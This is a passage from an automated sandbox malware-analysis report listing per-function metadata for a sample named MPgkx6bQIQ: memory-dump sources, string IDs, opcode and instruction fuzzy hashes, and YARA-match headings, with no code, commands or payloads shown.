                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: cdef
                                                                                                                                                                                                                                                                                          • API String ID: 0-4216504194
                                                                                                                                                                                                                                                                                          • Opcode ID: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
                                                                                                                                                                                                                                                                                          • Instruction ID: 572ca5d0947c520602ad4aba03d7ce4505958a586629e3af2f8388d03d5464aa
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94814871A08350CFC726CF14C890AABBBA1EFD6714F28896DD9D557395D731A801CBA2
                                                                                                                                                                                                                                                                                          Function 0043D830 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID: cdef
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-4216504194
                                                                                                                                                                                                                                                                                          • Opcode ID: 6bc07d34d1d6b00cc4b19fb39e7543bc3ba7a18e64985db278588bca8b02e99b
                                                                                                                                                                                                                                                                                          • Instruction ID: d704160fc5b89d86d9794d8a66ae716d782a0973953182dc9c1641cf0cee7e05
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bc07d34d1d6b00cc4b19fb39e7543bc3ba7a18e64985db278588bca8b02e99b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30815471A083108FC718DF24E88096BBBA2EFDA310F19993DE9D557352C735AC05C786
                                                                                                                                                                                                                                                                                          Function 0249734A Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                                                                          • API String ID: 0-1553575800
                                                                                                                                                                                                                                                                                          • Opcode ID: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
                                                                                                                                                                                                                                                                                          • Instruction ID: b72094360f49f593122c80eda49c80655e3dd75c4d2e22d7dcdaa45787506178
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C91E4B16507428FD724CF39C850BA6BBD2EB86314F18C57EC596CB796EB78A442C740
                                                                                                                                                                                                                                                                                          Function 024977E9 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: c$
                                                                                                                                                                                                                                                                                          • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                                          • Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                                          • Instruction ID: 1b5f3761f8c1b73a5bb898a2eb0581f8d149aa154b083609e48ed751defe9bdb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 349179B01117418FEB64CF25C8A0B63BBB2FF46318F159589C4864FBA1E379A846CB94
                                                                                                                                                                                                                                                                                          Function 024AB393 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: Fg
                                                                                                                                                                                                                                                                                          • API String ID: 0-875302535
                                                                                                                                                                                                                                                                                          • Opcode ID: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
                                                                                                                                                                                                                                                                                          • Instruction ID: 6364b440988ee8a53e54544f774f6c722a4190974d959617f58207090a1b733b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1581987161D3808AD7698F25C8657FBBBD3EBE2308F18996DC1D987392DB35400ACB16
                                                                                                                                                                                                                                                                                          Function 0042B12C Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: Fg
                                                                                                                                                                                                                                                                                          • API String ID: 0-875302535
                                                                                                                                                                                                                                                                                          • Opcode ID: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                                                                                                                                                                                                                                                          • Instruction ID: 81bd39487229f81fa75b1a19b8121f8c05985a2d1a0f7b16a24bef680633e699
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F81E47121D3808BE768CF25C8657ABBBD2EBD2304F58896DC1C987392DB38440ACB56
                                                                                                                                                                                                                                                                                          Function 02486117 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                                                          • API String ID: 0-3772416878
                                                                                                                                                                                                                                                                                          • Opcode ID: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                                                          • Instruction ID: bf278aadbb20038f6aab9d648416dd1b324c1514d35fea2726600984c625ad27
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93B148706083859FC361DF18C98062FFBE4AFA9604F444A2EE5D997342D631E918CBA7
                                                                                                                                                                                                                                                                                          Function 00405EB0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                                                          • API String ID: 0-3772416878
                                                                                                                                                                                                                                                                                          • Opcode ID: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                                                          • Instruction ID: 6b9defcb35fa499ff27616791264c6e5e8496363bec20089c87d7e70d31ec12b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72B136701087819FC321CF18C88061BBBE0AFA9704F444E6EF5D997382D635E918CBA7
                                                                                                                                                                                                                                                                                          Function 0249B348 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: js{g
                                                                                                                                                                                                                                                                                          • API String ID: 0-1014319796
                                                                                                                                                                                                                                                                                          • Opcode ID: 2bedd816319602fe80fa94cf924704a6c11e2863fdffa8fa3602250936590e55
                                                                                                                                                                                                                                                                                          • Instruction ID: f3dd9fa4310f82fc78a4f82b1fb38002df3e41983b5c04b0e86dde49876ea9e1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bedd816319602fe80fa94cf924704a6c11e2863fdffa8fa3602250936590e55
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA813271240B804BEB398F35D8517ABBBE2AB52718F08895DD5C39BF85C3B8E406CB00
                                                                                                                                                                                                                                                                                          Function 0041B0E1 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: js{g
                                                                                                                                                                                                                                                                                          • API String ID: 0-1014319796
                                                                                                                                                                                                                                                                                          • Opcode ID: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
                                                                                                                                                                                                                                                                                          • Instruction ID: 14be18684298a51b6f1365b8eea6b5aba3066a4a8cfe6059be97ad669d3f7baa
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF815671650B804BE7398F35C8517ABBBE2AB56718F08895DD4D39BB85C378E406CB44
                                                                                                                                                                                                                                                                                          Function 0041714B Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-1553575800
                                                                                                                                                                                                                                                                                          • Opcode ID: 09c846a2afc331d85edad14330251619ebe1679237f5647bd4b68f37056fbcaf
                                                                                                                                                                                                                                                                                          • Instruction ID: c6a45f7a1688543314b9a3a30fef6f223fff4d1289bb41df6adbe344278a34bf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09c846a2afc331d85edad14330251619ebe1679237f5647bd4b68f37056fbcaf
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F81D2717147418FD325CB39CC50BA6BBE2AB95308F18C57ED096CB7A6EA78A842C744
                                                                                                                                                                                                                                                                                          Function 024BD557 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                                          • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                                          • Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                                          • Instruction ID: ec4409d0e23f1815ae0e9a109a8d1c68bdff59348f28f477a7c06adb04673e52
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E981E374A04201DFD716DF28C880AABB7F2EFD9714F19856DE5858B3A1DB31E841CB52
                                                                                                                                                                                                                                                                                          Function 0043D2F0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                                          • Opcode ID: cdcb811f3b6eb00ba9c047de99187d2b4a3705ee1c65ea447f98f9511ad803bb
                                                                                                                                                                                                                                                                                          • Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdcb811f3b6eb00ba9c047de99187d2b4a3705ee1c65ea447f98f9511ad803bb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46
                                                                                                                                                                                                                                                                                          Function 024973B2 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                                                                          • API String ID: 0-1553575800
                                                                                                                                                                                                                                                                                          • Opcode ID: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
                                                                                                                                                                                                                                                                                          • Instruction ID: 3857215666f84e8390459b9bd9abf44e1a4e85b426ac560a58865be899005c0d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B671D2B17107414FD729CF39C85076ABBD2AB86314F18C57EC096CB7A6EA78E442CB40
                                                                                                                                                                                                                                                                                          Function 024AA637 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                          • Instruction ID: 045a9a66e0ca56219c33e5b6367f29c7ce276d61e6951a7732c068842d72bae6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A871D432A083658BD7248E2CC4A032FBBF2ABD5754F19852EE4949B391D335DC46CB82
                                                                                                                                                                                                                                                                                          Function 0042A3D0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                          • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                                                                                                                                                                                          Function 00424502 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: DB
                                                                                                                                                                                                                                                                                          • API String ID: 0-3908451873
                                                                                                                                                                                                                                                                                          • Opcode ID: b5d81c37cb7d393257c23fd21a2bc174357223c4d1b28a71c8bcec52b0dc5dc8
                                                                                                                                                                                                                                                                                          • Instruction ID: 63fe74dcdf674bdd3faef37b2e0283437cd793175f1af46cf0498e51130e9ee1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5d81c37cb7d393257c23fd21a2bc174357223c4d1b28a71c8bcec52b0dc5dc8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A381B67AF04225CBCB18CF64D8905AEB7B2FFDA710F59806AC841AB355DB349D42CB54
                                                                                                                                                                                                                                                                                          Function 00424A74 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: LB
                                                                                                                                                                                                                                                                                          • API String ID: 0-539997225
                                                                                                                                                                                                                                                                                          • Opcode ID: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                                                                                                                                                                                                                                                          • Instruction ID: 190c79d128488961cfb389f9b0ffad8fedd0031ada35975bf34f4c17adb32e46
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1618E31B412228BDB18CF29E8A12FBFBE2EF91310B58466ED4574B3C1D7389941D799
                                                                                                                                                                                                                                                                                          Function 0249DFB7 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: Y*>
                                                                                                                                                                                                                                                                                          • API String ID: 0-3862480330
                                                                                                                                                                                                                                                                                          • Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                                                          • Instruction ID: fb16322e453b7c659a8661eae6fdd911598fc5404158bfb078b4b9f78130c322
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C512633B499914BEB2DC93C4C223AAAE834BD6134B2DD77BD8B1CB3E5D56588468740
                                                                                                                                                                                                                                                                                          Function 0041DD50 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: Y*>
                                                                                                                                                                                                                                                                                          • API String ID: 0-3862480330
                                                                                                                                                                                                                                                                                          • Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                                                          • Instruction ID: 90e50e1672eaf7fe8d97f2f09bdb4033b3ef25f85dbdb073c688402916a0328e
